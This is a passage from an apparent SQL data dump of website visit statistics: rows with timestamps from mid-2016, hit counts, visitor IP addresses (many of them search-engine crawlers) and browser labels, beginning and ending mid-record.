0,1467098482,1,1,0,0,'141.8.142.58','other'),(45831,1467099176,1,1,0,0,'52.3.127.144','other'),(45832,1467099522,1,1,0,0,'130.193.50.34','other'),(45833,1467099523,1,1,0,0,'141.8.183.19','other'),(45834,1467101154,1,1,0,0,'91.124.182.217','firefox'),(45835,1467101419,1,1,0,0,'66.249.78.150','chrome'),(45836,1467101492,1,1,0,0,'66.249.69.170','chrome'),(45837,1467101577,1,1,0,0,'157.55.39.13','other'),(45838,1467103114,2,2,0,0,'52.3.127.144','other'),(45839,1467103786,2,2,0,0,'130.193.50.34','other'),(45840,1467103961,2,2,0,0,'51.255.51.250','other'),(45841,1467105276,1,0,1,0,'66.249.78.164',''),(45842,1467105417,1,1,0,0,'164.132.161.58','other'),(45843,1467105607,1,1,0,0,'130.193.51.19','other'),(45844,1467106515,1,1,0,0,'207.46.13.39','other'),(45845,1467106770,1,1,0,0,'141.8.183.25','other'),(45846,1467107075,1,0,1,0,'66.249.78.178',''),(45847,1467107587,1,1,0,0,'130.193.50.34','other'),(45848,1467108373,1,1,0,0,'52.3.127.144','other'),(45849,1467108818,1,1,0,0,'130.193.51.19','other'),(45850,1467110870,4,4,0,0,'52.3.127.144','other'),(45851,1467113778,2,2,0,0,'130.193.50.34','other'),(45852,1467113779,2,2,0,0,'141.8.183.25','other'),(45853,1467114197,1,1,0,0,'52.3.127.144','other'),(45854,1467115148,2,2,0,0,'78.160.191.173','other'),(45856,1467115468,1,1,0,0,'207.46.13.39','other'),(45857,1467116119,1,1,0,0,'174.34.135.242','other'),(45858,1467118790,1,1,0,0,'82.207.18.233','chrome'),(45859,1467119973,1,1,0,0,'40.77.167.49','other'),(45860,1467120177,2,2,0,0,'52.3.127.144','other'),(45861,1467120524,1,1,0,0,'149.202.54.50','other'),(45862,1467120897,1,1,0,0,'94.179.69.185','chrome'),(45863,1467121228,1,1,0,0,'91.124.182.217','firefox'),(45864,1467121410,1,0,1,0,'66.249.78.136',''),(45865,1467123686,1,1,0,0,'91.196.178.97','chrome'),(45866,1467124556,1,0,1,0,'66.249.78.136',''),(45867,1467125065,1,1,0,0,'91.124.182.217','firefox'),(45868,1467125318,1,1,0,0,'52.3.127.144','other'),(45869,1467127276,1,1,0,0,'141.8.183.25','other'),(45870,1467127277,1,1,0,0,'141.8.142.61','other'),(45871,1467132665,1,1,0,0,'52.3.127.144','other'),(45873,1467134123,1,1,0,0,'52.3.127.144','other'),(45874,1467134692,1,0,1,0,'66.249.78.178',''),(45875,1467135910,2,2,0,0,'52.3.127.144','other'),(45876,1467137025,1,1,0,0,'40.77.167.49','other'),(45877,1467137088,1,1,0,0,'130.193.51.19','other'),(45878,1467137089,1,1,0,0,'141.8.183.25','other'),(45879,1467137791,2,2,0,0,'130.193.50.34','other'),(45880,1467137792,2,2,0,0,'141.8.142.58','other'),(45881,1467138249,1,0,1,0,'66.249.78.164',''),(45882,1467138436,1,1,0,0,'52.3.127.144','other'),(45883,1467138943,1,0,1,0,'66.249.78.178',''),(45884,1467139598,2,2,0,0,'141.8.142.58','other'),(45886,1467139906,1,1,0,0,'130.193.51.19','other'),(45887,1467140184,1,1,0,0,'141.8.183.25','other'),(45888,1467140186,1,1,0,0,'130.193.50.34','other'),(45889,1467141224,1,1,0,0,'52.3.127.144','other'),(45890,1467141584,1,1,0,0,'207.46.13.39','other'),(45891,1467142649,2,2,0,0,'52.3.127.144','other'),(45892,1467144057,2,2,0,0,'52.3.127.144','other'),(45893,1467144160,1,1,0,0,'91.196.178.67','chrome'),(45894,1467144202,2,2,0,0,'141.8.183.25','other'),(45895,1467145133,1,1,0,0,'141.8.183.25','other'),(45896,1467145134,1,1,0,0,'130.193.50.34','other'),(45897,1467146239,1,0,1,0,'66.249.78.164',''),(45898,1467148754,2,2,0,0,'130.193.50.34','other'),(45899,1467149249,1,1,0,0,'78.111.189.52','chrome'),(45900,1467150519,1,1,0,0,'130.193.50.34','other'),(45901,1467150817,2,2,0,0,'141.8.183.25','other'),(45902,1467151074,1,1,0,0,'51.255.65.71','other'),(45903,1467151110,5,5,0,0,'193.254.238.25','firefox'),(45904,1467151378,1,1,0,0,'52.3.127.144','other'),(45905,1467151446,1,1,0,0,'130.193.50.34','other'),(45906,1467151875,1,1,0,0,'141.8.183.25','other'),(45907,1467151876,1,1,0,0,'141.8.142.61','other'),(45908,1467152413,2,2,0,0,'130.193.50.34','other'),(45909,1467152537,3,3,0,0,'130.193.51.19','other'),(45910,1467152971,2,2,0,0,'141.8.183.25','other'),(45911,1467153056,3,3,0,0,'52.3.127.144','other'),(45912,1467153386,1,1,0,0,'130.193.50.34','other'),(45913,1467153629,1,1,0,0,'141.8.142.61','other'),(45914,1467155338,1,1,0,0,'51.255.65.16','other'),(45915,1467155483,1,1,0,0,'141.8.142.58','other'),(45916,1467156057,1,1,0,0,'130.193.50.34','other'),(45917,1467158380,1,1,0,0,'130.193.50.34','other'),(45918,1467158382,1,1,0,0,'141.8.183.25','other'),(45919,1467159433,1,1,0,0,'52.3.127.144','other'),(45920,1467160129,1,1,0,0,'5.164.124.124','chrome'),(45921,1467160865,1,1,0,0,'46.188.32.103','firefox'),(45922,1467160932,1,1,0,0,'141.8.142.58','other'),(45923,1467162625,1,0,1,0,'66.249.78.171',''),(45924,1467163144,1,1,0,0,'141.8.183.25','other'),(45925,1467163604,1,1,0,0,'130.193.50.34','other'),(45926,1467164395,2,2,0,0,'141.8.142.58','other'),(45927,1467165250,1,1,0,0,'52.3.127.144','other'),(45928,1467165342,2,0,2,0,'68.180.229.171',''),(45929,1467166161,2,2,0,0,'130.193.50.34','other'),(45930,1467167473,1,1,0,0,'141.8.183.25','other'),(45931,1467167846,1,1,0,0,'52.3.127.144','other'),(45932,1467168520,1,1,0,0,'93.158.152.51','other'),(45933,1467168521,1,1,0,0,'5.255.253.68','other'),(45934,1467170252,1,0,1,0,'66.249.78.150',''),(45935,1467172210,1,1,0,0,'130.193.50.34','other'),(45936,1467174957,1,1,0,0,'130.193.51.19','other'),(45937,1467175567,1,1,0,0,'130.193.50.34','other'),(45938,1467176128,2,2,0,0,'130.193.51.19','other'),(45939,1467176433,2,2,0,0,'141.8.142.61','other'),(45940,1467176489,1,0,1,0,'66.249.75.199',''),(45941,1467176853,1,1,0,0,'91.196.178.67','firefox'),(45942,1467177062,1,1,0,0,'213.179.252.206','chrome'),(45943,1467177358,4,4,0,0,'46.165.197.142','other'),(45944,1467177855,2,2,0,0,'52.3.127.144','other'),(45945,1467178193,1,0,1,0,'66.249.75.191',''),(45946,1467178680,1,1,0,0,'91.196.178.67','firefox'),(45947,1467179235,1,1,0,0,'52.3.127.144','other'),(45948,1467179359,1,0,1,0,'66.249.75.247',''),(45949,1467179605,2,2,0,0,'130.193.50.34','other'),(45950,1467179696,1,1,0,0,'141.8.183.25','other'),(45951,1467179825,1,1,0,0,'66.249.93.121','chrome'),(45952,1467180341,1,1,0,0,'94.179.20.92','firefox'),(45953,1467181074,1,0,1,0,'66.249.78.164',''),(45954,1467181466,1,0,1,0,'66.249.78.136',''),(45955,1467182244,1,1,0,0,'91.196.178.67','firefox'),(45956,1467182344,1,1,0,0,'94.231.180.21','chrome'),(45957,1467182446,1,1,0,0,'82.207.91.234','firefox'),(45958,1467182597,2,2,0,0,'141.8.183.25','other'),(45959,1467182863,1,1,0,0,'157.55.39.13','other'),(45960,1467182902,1,1,0,0,'130.193.51.19','other'),(45961,1467183428,1,1,0,0,'94.231.180.21','chrome'),(45962,1467185104,1,1,0,0,'91.196.178.67','firefox'),(45963,1467185124,1,1,0,0,'94.179.103.88','firefox'),(45964,1467185187,1,0,1,0,'66.249.78.164',''),(45965,1467185856,1,1,0,0,'141.8.142.61','other'),(45966,1467185998,1,1,0,0,'207.46.13.39','other'),(45967,1467186707,1,0,1,0,'66.249.75.239',''),(45968,1467186722,1,0,1,0,'66.249.78.143',''),(45970,1467186724,6,1,5,0,'66.249.78.136',''),(45971,1467186733,3,0,3,0,'66.249.69.239',''),(45972,1467186738,1,1,0,0,'66.249.69.239','chrome'),(45973,1467186882,1,1,0,0,'93.73.234.193','firefox'),(45974,1467186958,1,1,0,0,'141.8.183.25','other'),(45975,1467187082,1,1,0,0,'91.196.178.65','firefox'),(45976,1467187430,1,1,0,0,'91.196.178.166','chrome'),(45977,1467187620,1,1,0,0,'157.55.39.13','other'),(45978,1467187700,1,1,0,0,'66.249.78.136','chrome'),(45979,1467187980,1,0,1,0,'68.180.229.171',''),(45980,1467188539,1,0,1,0,'66.249.78.171',''),(45981,1467188703,1,1,0,0,'91.196.178.67','firefox'),(45982,1467189045,1,1,0,0,'178.93.60.70','chrome'),(45983,1467189082,1,1,0,0,'66.249.78.136','chrome'),(45984,1467189285,1,1,0,0,'130.193.51.19','other'),(45985,1467189289,1,1,0,0,'130.193.50.34','other'),(45986,1467189648,1,1,0,0,'91.196.178.67','firefox'),(45987,1467190847,1,0,1,0,'66.249.78.143',''),(45988,1467190861,1,0,1,0,'66.249.78.150',''),(45989,1467190865,1,1,0,0,'66.249.78.143','chrome'),(45990,1467190899,1,1,0,0,'91.196.178.65','firefox'),(45991,1467191007,1,1,0,0,'141.8.142.58','other'),(45992,1467191021,1,1,0,0,'91.196.179.134','chrome'),(45993,1467191183,2,2,0,0,'52.3.127.144','other'),(45994,1467192050,1,0,1,0,'66.249.78.178',''),(45995,1467192176,1,1,0,0,'130.193.50.34','other'),(45996,1467192251,1,0,1,0,'66.249.78.164',''),(45997,1467192353,1,0,1,0,'66.249.78.171',''),(45998,1467192565,1,1,0,0,'94.179.238.41','firefox'),(45999,1467192786,1,1,0,0,'69.30.201.98','other'),(46000,1467193308,1,1,0,0,'91.196.178.67','firefox'),(46001,1467193765,2,2,0,0,'130.193.50.34','other'),(46002,1467193777,4,4,0,0,'51.254.130.62','other'),(46003,1467194452,2,2,0,0,'141.8.142.58','other'),(46004,1467194712,2,2,0,0,'130.193.50.34','other'),(46005,1467194822,1,1,0,0,'91.124.27.9','chrome'),(46006,1467195229,2,2,0,0,'141.8.142.61','other'),(46007,1467195481,1,1,0,0,'52.3.127.144','other'),(46008,1467195830,3,3,0,0,'141.8.183.25','other'),(46009,1467195831,2,2,0,0,'130.193.50.34','other'),(46010,1467196169,1,1,0,0,'141.8.142.58','other'),(46011,1467196294,1,1,0,0,'51.255.65.85','other'),(46012,1467196330,1,1,0,0,'130.193.51.19','other'),(46013,1467197484,1,1,0,0,'37.53.171.29','chrome'),(46014,1467198132,2,2,0,0,'130.193.50.34','other'),(46015,1467198177,1,1,0,0,'91.196.178.166','chrome'),(46016,1467198730,1,1,0,0,'141.8.183.25','other'),(46017,1467198900,1,1,0,0,'95.134.243.42','chrome'),(46018,1467199534,1,1,0,0,'91.196.178.67','firefox'),(46019,1467199711,4,4,0,0,'178.203.146.227','other'),(46020,1467199809,1,0,1,0,'66.249.78.136',''),(46021,1467200005,1,0,1,0,'66.249.78.164',''),(46022,1467200117,1,1,0,0,'207.46.13.39','other'),(46023,1467200628,1,1,0,0,'91.196.178.130','firefox'),(46024,1467200729,1,1,0,0,'52.3.127.144','other'),(46025,1467201216,1,1,0,0,'141.8.142.67','other'),(46026,1467201369,1,1,0,0,'130.193.50.34','other'),(46027,1467201549,1,0,1,0,'66.249.78.178',''),(46028,1467201621,1,1,0,0,'178.93.60.70','chrome'),(46029,1467202670,1,1,0,0,'91.196.178.130','chrome'),(46030,1467202715,1,1,0,0,'141.8.142.58','other'),(46031,1467202763,1,1,0,0,'130.193.50.34','other'),(46032,1467202953,1,1,0,0,'130.193.51.19','other'),(46033,1467203075,2,2,0,0,'52.3.127.144','other'),(46034,1467203487,1,0,1,0,'68.180.229.171',''),(46035,1467204094,1,1,0,0,'141.8.142.58','other'),(46036,1467204266,1,1,0,0,'178.93.60.70','chrome'),(46037,1467204303,1,1,0,0,'130.193.50.34','other'),(46038,1467205280,1,0,1,0,'66.249.78.171',''),(46039,1467205388,2,2,0,0,'141.8.183.25','other'),(46040,1467206329,1,1,0,0,'77.109.22.140','chrome'),(46041,1467207611,1,0,1,0,'66.249.78.164',''),(46042,1467208446,1,1,0,0,'130.193.50.34','other'),(46043,1467208447,1,1,0,0,'130.193.51.19','other'),(46044,1467208451,1,1,0,0,'213.179.252.206','chrome'),(46045,1467208826,1,1,0,0,'5.58.82.4','firefox'),(46046,1467209459,2,0,2,0,'68.180.229.171',''),(46047,1467209771,1,1,0,0,'180.76.15.10','other'),(46048,1467210210,1,1,0,0,'141.8.183.25','other'),(46049,1467210368,1,1,0,0,'130.193.50.34','other'),(46050,1467210929,2,2,0,0,'52.3.127.144','other'),(46051,1467211642,1,0,1,0,'66.249.78.150',''),(46052,1467212230,1,1,0,0,'141.8.183.25','other'),(46053,1467212234,1,0,1,0,'66.249.75.191',''),(46054,1467212852,1,1,0,0,'91.196.178.67','firefox'),(46055,1467213294,1,1,0,0,'130.193.50.34','other'),(46056,1467213296,1,1,0,0,'141.8.183.25','other'),(46057,1467213567,1,0,1,0,'66.249.78.164',''),(46058,1467214125,1,0,1,0,'66.249.78.150',''),(46059,1467214258,1,1,0,0,'66.249.75.231','chrome'),(46060,1467214368,5,0,5,0,'68.180.229.171',''),(46061,1467214460,1,1,0,0,'141.8.183.25','other'),(46062,1467214461,1,1,0,0,'130.193.50.34','other'),(46063,1467214470,1,0,1,0,'66.249.78.171',''),(46064,1467214752,1,1,0,0,'207.46.13.39','other'),(46065,1467215117,1,0,1,0,'66.249.78.136',''),(46066,1467217347,1,1,0,0,'157.55.39.81','other'),(46067,1467218320,1,1,0,0,'130.193.50.34','other'),(46068,1467219173,100,100,0,0,'208.43.225.84','other'),(46069,1467219388,1,0,1,0,'66.249.78.171',''),(46070,1467219834,44,44,0,0,'208.43.225.85','other'),(46071,1467219869,1,1,0,0,'157.55.39.81','other'),(46072,1467219887,2,2,0,0,'130.193.50.34','other'),(46073,1467219903,2,2,0,0,'141.8.183.25','other'),(46074,1467219947,1,1,0,0,'141.8.142.58','other'),(46075,1467220084,12,12,0,0,'208.43.225.84','other'),(46076,1467220853,1,1,0,0,'66.249.78.171','chrome'),(46077,1467221118,1,1,0,0,'141.8.183.25','other'),(46078,1467221261,2,2,0,0,'130.193.51.19','other'),(46079,1467221326,1,1,0,0,'66.249.78.136','chrome'),(46080,1467221337,1,1,0,0,'66.249.78.178','chrome'),(46081,1467221457,3,3,0,0,'130.193.50.34','other'),(46082,1467221682,1,1,0,0,'91.196.178.72','chrome'),(46083,1467222140,1,1,0,0,'93.158.152.84','other'),(46084,1467222343,1,1,0,0,'141.8.142.61','other'),(46085,1467222380,1,1,0,0,'141.8.183.25','other'),(46086,1467222437,1,0,1,0,'66.249.69.180',''),(46087,1467222476,2,2,0,0,'130.193.50.34','other'),(46088,1467226502,1,1,0,0,'193.194.127.217','firefox'),(46089,1467226600,1,1,0,0,'46.201.137.218','chrome'),(46090,1467226621,1,1,0,0,'5.255.253.68','other'),(46091,1467227234,1,1,0,0,'40.77.167.49','other'),(46092,1467227321,1,0,1,0,'66.249.78.143',''),(46093,1467227663,1,1,0,0,'52.3.127.144','other'),(46094,1467227681,2,2,0,0,'207.46.13.39','other'),(46095,1467228971,1,1,0,0,'93.158.152.61','other'),(46096,1467228972,3,3,0,0,'88.198.230.79','other'),(46097,1467229078,1,1,0,0,'5.255.253.53','other'),(46098,1467229111,1,1,0,0,'164.132.161.35','other'),(46099,1467229171,1,1,0,0,'5.255.253.9','other'),(46100,1467229172,1,1,0,0,'141.8.184.22','other'),(46101,1467229175,1,1,0,0,'5.255.253.55','other'),(46102,1467229285,1,1,0,0,'91.196.178.35','chrome'),(46103,1467229924,1,1,0,0,'141.8.142.78','other'),(46104,1467230209,1,1,0,0,'151.80.31.180','other'),(46105,1467231077,2,0,2,0,'68.180.229.171',''),(46106,1467231216,1,1,0,0,'91.196.178.164','firefox'),(46107,1467231258,1,1,0,0,'52.3.127.144','other'),(46108,1467232463,1,1,0,0,'141.8.183.14','other'),(46109,1467232685,1,1,0,0,'141.8.132.10','other'),(46110,1467232778,1,1,0,0,'141.8.142.78','other'),(46111,1467233058,1,1,0,0,'93.158.152.75','other'),(46112,1467234081,1,1,0,0,'66.249.78.150','chrome'),(46113,1467234631,1,1,0,0,'130.193.37.7','other'),(46114,1467234740,1,1,0,0,'93.158.152.51','other'),(46115,1467234742,1,1,0,0,'141.8.132.30','other'),(46116,1467234782,1,1,0,0,'178.154.189.31','other'),(46117,1467234785,1,1,0,0,'66.249.78.143','chrome'),(46118,1467234863,2,2,0,0,'141.8.183.25','other'),(46119,1467234994,1,1,0,0,'66.249.78.136','chrome'),(46120,1467235069,1,1,0,0,'93.158.152.84','other'),(46121,1467235198,1,1,0,0,'141.8.142.85','other'),(46122,1467235230,1,0,1,0,'68.180.229.171',''),(46123,1467235650,1,1,0,0,'157.55.39.81','other'),(46124,1467236694,1,0,1,0,'66.249.75.95',''),(46125,1467238572,1,0,1,0,'66.249.78.171',''),(46126,1467238739,1,1,0,0,'157.55.39.81','other'),(46127,1467240908,1,1,0,0,'87.223.164.88','firefox'),(46128,1467241230,2,2,0,0,'93.158.152.84','other'),(46129,1467241324,2,2,0,0,'178.154.189.31','other'),(46130,1467241340,1,1,0,0,'141.8.142.25','other'),(46131,1467241424,1,1,0,0,'141.8.142.61','other'),(46132,1467241490,1,1,0,0,'157.55.39.81','other'),(46133,1467241505,1,1,0,0,'93.158.152.9','other'),(46134,1467241515,3,3,0,0,'141.8.132.41','other'),(46135,1467241540,1,1,0,0,'141.8.142.78','other'),(46136,1467241700,1,1,0,0,'141.8.142.67','other'),(46137,1467241801,1,0,1,0,'66.249.78.136',''),(46138,1467241824,1,1,0,0,'130.193.50.4','other'),(46139,1467241834,1,1,0,0,'141.8.132.10','other'),(46140,1467241949,1,1,0,0,'178.154.189.37','other'),(46141,1467242075,1,1,0,0,'130.193.51.79','other'),(46142,1467242345,1,1,0,0,'141.8.142.85','other'),(46143,1467242476,1,1,0,0,'178.154.149.10','other'),(46144,1467242628,1,1,0,0,'141.8.142.58','other'),(46145,1467242902,1,1,0,0,'141.8.132.30','other'),(46146,1467243222,1,1,0,0,'141.8.142.25','other'),(46147,1467243225,1,1,0,0,'141.8.183.19','other'),(46148,1467243382,2,0,2,0,'68.180.229.171',''),(46149,1467243389,1,1,0,0,'141.8.142.85','other'),(46150,1467244932,1,1,0,0,'141.8.142.25','other'),(46151,1467245008,1,1,0,0,'130.193.50.6','other'),(46152,1467245055,1,0,1,0,'66.249.78.178',''),(46153,1467245180,1,1,0,0,'141.8.183.25','other'),(46154,1467245275,1,1,0,0,'5.255.253.67','other'),(46155,1467245315,1,1,0,0,'91.121.157.80','other'),(46156,1467245375,2,2,0,0,'141.8.132.30','other'),(46157,1467245475,1,1,0,0,'141.8.142.58','other'),(46158,1467245584,1,1,0,0,'130.193.51.79','other'),(46159,1467245867,1,1,0,0,'141.8.142.25','other'),(46160,1467246005,1,1,0,0,'141.8.142.61','other'),(46161,1467246527,1,1,0,0,'91.196.178.38','chrome'),(46162,1467246564,1,0,1,0,'66.249.78.178',''),(46163,1467247095,2,2,0,0,'178.154.189.31','other'),(46164,1467247435,1,1,0,0,'130.193.50.4','other'),(46165,1467247721,1,1,0,0,'52.3.127.144','other'),(46166,1467248760,1,0,1,0,'66.249.78.178',''),(46167,1467249643,1,1,0,0,'164.132.161.11','other'),(46168,1467250890,1,1,0,0,'180.76.15.22','other'),(46169,1467251207,1,0,1,0,'66.249.78.164',''),(46170,1467256740,1,1,0,0,'164.132.161.49','other'),(46171,1467257609,1,1,0,0,'130.193.37.7','other'),(46172,1467257611,1,1,0,0,'178.154.189.37','other'),(46173,1467257934,1,1,0,0,'93.158.152.75','other'),(46174,1467257936,1,1,0,0,'141.8.183.14','other'),(46175,1467258153,1,0,1,0,'66.249.78.164',''),(46176,1467258394,1,1,0,0,'52.3.105.23','other'),(46177,1467258398,1,0,1,0,'68.180.229.171',''),(46178,1467258688,1,0,1,0,'66.249.78.178',''),(46179,1467259087,1,0,1,0,'66.249.75.207',''),(46180,1467259306,1,1,0,0,'180.76.15.135','other'),(46181,1467260657,1,1,0,0,'141.8.132.30','other'),(46182,1467260658,1,1,0,0,'130.193.50.4','other'),(46183,1467260817,2,0,2,0,'66.249.78.178',''),(46184,1467261860,1,1,0,0,'141.8.142.67','other'),(46185,1467261862,1,1,0,0,'130.193.50.6','other'),(46186,1467262516,1,1,0,0,'207.46.13.39','other'),(46187,1467263780,1,1,0,0,'94.179.6.208','chrome'),(46188,1467264247,1,1,0,0,'52.3.105.23','other'),(46189,1467264593,2,2,0,0,'176.120.60.254','firefox'),(46190,1467264945,1,1,0,0,'91.196.178.67','firefox'),(46191,1467265378,2,2,0,0,'46.174.243.67','firefox'),(46192,1467265498,1,1,0,0,'164.132.161.79','other'),(46193,1467265695,1,1,0,0,'52.3.127.144','other'),(46194,1467266042,1,1,0,0,'91.196.178.72','firefox'),(46195,1467266145,1,1,0,0,'91.196.178.66','firefox'),(46196,1467266911,1,1,0,0,'207.46.13.39','other'),(46197,1467268372,1,1,0,0,'141.0.12.131','chrome'),(46198,1467268383,1,1,0,0,'52.3.127.144','other'),(46199,1467269977,1,1,0,0,'78.111.190.185','chrome'),(46200,1467270019,1,1,0,0,'66.249.93.121','chrome'),(46201,1467271083,1,1,0,0,'207.46.13.39','other'),(46202,1467271329,1,1,0,0,'95.135.50.250','chrome'),(46203,1467271556,1,1,0,0,'66.249.93.125','chrome'),(46204,1467271613,1,1,0,0,'91.196.178.35','firefox'),(46205,1467271722,1,1,0,0,'91.196.178.130','firefox'),(46206,1467271882,21,21,0,0,'93.180.64.135','other'),(46207,1467271989,1,1,0,0,'207.46.13.39','other'),(46208,1467272198,1,1,0,0,'178.92.155.45','chrome'),(46209,1467272247,1,1,0,0,'37.55.7.6','chrome'),(46210,1467272307,1,1,0,0,'52.3.105.23','other'),(46211,1467273713,1,1,0,0,'91.196.178.35','firefox'),(46212,1467273901,1,1,0,0,'180.76.15.141','other'),(46213,1467274724,1,1,0,0,'208.115.113.82','other'),(46214,1467274736,1,1,0,0,'91.196.178.67','chrome'),(46215,1467274805,1,0,1,0,'66.249.78.136',''),(46216,1467275189,1,1,0,0,'92.52.188.244','chrome'),(46217,1467276387,1,1,0,0,'178.93.238.167','opera'),(46218,1467276483,2,0,2,0,'68.180.229.171',''),(46219,1467276766,1,1,0,0,'52.3.127.144','other'),(46220,1467277338,1,1,0,0,'178.154.189.31','other'),(46221,1467277340,1,1,0,0,'141.8.132.10','other'),(46222,1467277623,1,1,0,0,'82.207.91.234','firefox'),(46223,1467279012,1,1,0,0,'93.158.152.51','other'),(46224,1467279016,1,1,0,0,'130.193.50.4','other'),(46225,1467279017,1,1,0,0,'178.154.149.11','other'),(46226,1467279590,1,1,0,0,'180.76.15.17','other'),(46227,1467279614,1,1,0,0,'91.124.29.48','firefox'),(46228,1467279830,1,1,0,0,'66.249.93.94','chrome'),(46229,1467280254,1,0,1,0,'66.249.78.164',''),(46230,1467280364,1,1,0,0,'91.196.178.130','chrome'),(46231,1467280384,1,1,0,0,'40.77.167.49','other'),(46232,1467280917,1,1,0,0,'91.196.178.67','firefox'),(46233,1467281478,1,0,1,0,'66.249.69.175',''),(46234,1467281596,1,0,1,0,'66.249.78.150',''),(46235,1467281733,1,0,1,0,'66.249.78.136',''),(46236,1467282295,1,1,0,0,'180.76.15.12','other'),(46237,1467283433,1,0,1,0,'66.249.78.178',''),(46238,1467284046,1,1,0,0,'91.196.178.70','firefox'),(46239,1467284075,1,1,0,0,'130.193.50.6','other'),(46240,1467284302,1,1,0,0,'180.76.15.8','other'),(46241,1467285216,1,1,0,0,'164.132.161.80','other'),(46242,1467285268,1,1,0,0,'52.3.127.144','other'),(46243,1467285344,1,1,0,0,'91.196.178.67','chrome'),(46244,1467285514,1,0,1,0,'68.180.229.171',''),(46245,1467285528,1,0,1,0,'66.249.78.171',''),(46246,1467285532,1,0,1,0,'66.249.78.143',''),(46247,1467286110,1,1,0,0,'40.77.167.49','other'),(46248,1467286418,1,1,0,0,'91.196.178.35','firefox'),(46249,1467286536,1,1,0,0,'91.196.178.69','chrome'),(46250,1467286893,1,1,0,0,'193.194.111.13','chrome'),(46251,1467287373,1,1,0,0,'130.193.50.34','other'),(46252,1467287842,1,1,0,0,'130.193.51.19','other'),(46253,1467288012,1,1,0,0,'141.8.142.61','other'),(46254,1467289062,2,2,0,0,'192.166.218.214','other'),(46255,1467289795,1,1,0,0,'91.196.178.67','firefox'),(46256,1467289814,1,0,1,0,'66.249.78.143',''),(46257,1467289954,1,1,0,0,'91.196.178.65','firefox'),(46258,1467290105,2,2,0,0,'37.55.130.253','firefox'),(46259,1467290187,1,1,0,0,'52.3.127.144','other'),(46260,1467290513,1,1,0,0,'37.55.205.116','chrome'),(46261,1467290614,1,0,1,0,'66.249.78.171',''),(46262,1467290909,1,1,0,0,'52.3.105.23','other'),(46263,1467291042,1,0,1,0,'66.249.78.178',''),(46264,1467291201,1,1,0,0,'52.3.127.144','other'),(46265,1467291506,1,1,0,0,'157.55.39.75','other'),(46266,1467292761,1,1,0,0,'178.95.246.28','firefox'),(46267,1467292828,1,0,1,0,'66.249.78.178',''),(46268,1467293236,1,1,0,0,'141.8.142.58','other'),(46269,1467294065,1,1,0,0,'94.179.5.239','firefox'),(46270,1467294519,1,1,0,0,'66.249.69.239','chrome'),(46271,1467294615,1,1,0,0,'66.249.75.199','chrome'),(46272,1467294845,2,2,0,0,'141.8.183.25','other'),(46273,1467295006,1,1,0,0,'194.44.130.126','chrome'),(46274,1467295154,1,1,0,0,'199.58.86.211','other'),(46275,1467295282,1,1,0,0,'52.3.105.23','other'),(46276,1467295394,1,1,0,0,'157.55.39.75','other'),(46277,1467295457,1,0,1,0,'66.249.78.178',''),(46278,1467295469,1,0,1,0,'68.180.229.171',''),(46279,1467295511,1,1,0,0,'37.54.168.117','firefox'),(46280,1467295637,2,0,2,0,'66.249.78.164',''),(46281,1467295852,1,1,0,0,'31.41.89.102','chrome'),(46282,1467295986,1,1,0,0,'95.135.208.16','chrome'),(46283,1467296614,1,1,0,0,'157.55.39.75','other'),(46284,1467297119,1,1,0,0,'66.249.78.171','chrome'),(46285,1467297337,1,0,1,0,'66.249.78.150',''),(46286,1467298390,1,1,0,0,'66.249.78.171','chrome'),(46287,1467298403,1,1,0,0,'40.77.167.49','other'),(46288,1467299682,3,0,3,0,'68.180.229.171',''),(46289,1467299862,1,1,0,0,'40.77.167.49','other'),(46290,1467299982,1,1,0,0,'176.36.0.159','chrome'),(46291,1467300158,1,1,0,0,'52.3.105.23','other'),(46292,1467300818,1,1,0,0,'130.193.50.34','other'),(46293,1467301153,1,1,0,0,'78.111.189.214','chrome'),(46294,1467302416,1,1,0,0,'130.193.50.34','other'),(46295,1467303042,2,2,0,0,'91.196.178.166','chrome'),(46296,1467303268,1,1,0,0,'141.8.183.25','other'),(46297,1467303273,1,1,0,0,'66.249.78.136','chrome'),(46298,1467303293,1,1,0,0,'66.249.78.171','chrome'),(46299,1467304015,1,1,0,0,'176.122.101.5','chrome'),(46300,1467304521,1,1,0,0,'130.193.51.19','other'),(46301,1467304710,1,1,0,0,'141.8.183.25','other'),(46302,1467304712,2,2,0,0,'130.193.50.34','other'),(46303,1467304784,1,1,0,0,'157.55.39.75','other'),(46304,1467305390,1,0,1,0,'66.249.78.150',''),(46305,1467305458,1,1,0,0,'94.179.39.176','firefox'),(46306,1467305483,1,1,0,0,'180.76.15.145','other'),(46307,1467305541,1,1,0,0,'52.3.127.144','other'),(46308,1467305861,1,1,0,0,'130.193.51.19','other'),(46309,1467306077,1,1,0,0,'180.76.15.142','other'),(46310,1467306228,1,1,0,0,'52.3.105.23','other'),(46311,1467306306,2,2,0,0,'141.8.183.25','other'),(46312,1467306434,1,1,0,0,'141.8.142.58','other'),(46313,1467306437,1,1,0,0,'141.8.142.61','other'),(46314,1467306775,2,2,0,0,'130.193.50.34','other'),(46315,1467306980,1,1,0,0,'130.193.51.19','other'),(46316,1467307408,1,1,0,0,'141.8.183.25','other'),(46317,1467307422,1,1,0,0,'157.55.39.75','other'),(46318,1467308185,1,1,0,0,'40.77.167.49','other'),(46319,1467309686,1,1,0,0,'141.8.132.41','other'),(46320,1467309689,1,1,0,0,'130.193.51.14','other'),(46321,1467309690,1,1,0,0,'130.193.50.4','other'),(46322,1467310327,1,1,0,0,'5.255.253.36','other'),(46323,1467310470,1,0,1,0,'66.249.75.199',''),(46324,1467310486,1,1,0,0,'141.8.132.2','other'),(46325,1467310488,1,1,0,0,'141.8.142.88','other'),(46326,1467310496,1,1,0,0,'93.158.152.46','other'),(46327,1467310605,1,1,0,0,'5.255.253.30','other'),(46328,1467311892,3,0,3,0,'68.180.229.171',''),(46329,1467313040,1,0,1,0,'66.249.78.136',''),(46330,1467313868,1,0,1,0,'66.249.78.150',''),(46331,1467314292,1,0,1,0,'66.249.78.136',''),(46332,1467314350,1,1,0,0,'157.55.39.81','other'),(46333,1467314804,1,1,0,0,'66.249.78.171','chrome'),(46334,1467315626,1,1,0,0,'157.55.39.81','other'),(46335,1467316165,1,1,0,0,'52.3.105.23','other'),(46336,1467316303,2,0,2,0,'66.249.75.207',''),(46337,1467316540,1,1,0,0,'194.213.105.227','chrome'),(46338,1467316549,1,1,0,0,'52.3.127.144','other'),(46339,1467316557,1,1,0,0,'130.193.50.34','other'),(46340,1467316563,1,1,0,0,'40.77.167.49','other'),(46341,1467316669,1,1,0,0,'141.8.183.25','other'),(46342,1467316784,2,2,0,0,'157.55.39.75','other'),(46343,1467317845,1,1,0,0,'130.193.50.34','other'),(46344,1467318285,1,1,0,0,'157.55.39.75','other'),(46345,1467318365,1,1,0,0,'157.55.39.81','other'),(46346,14673192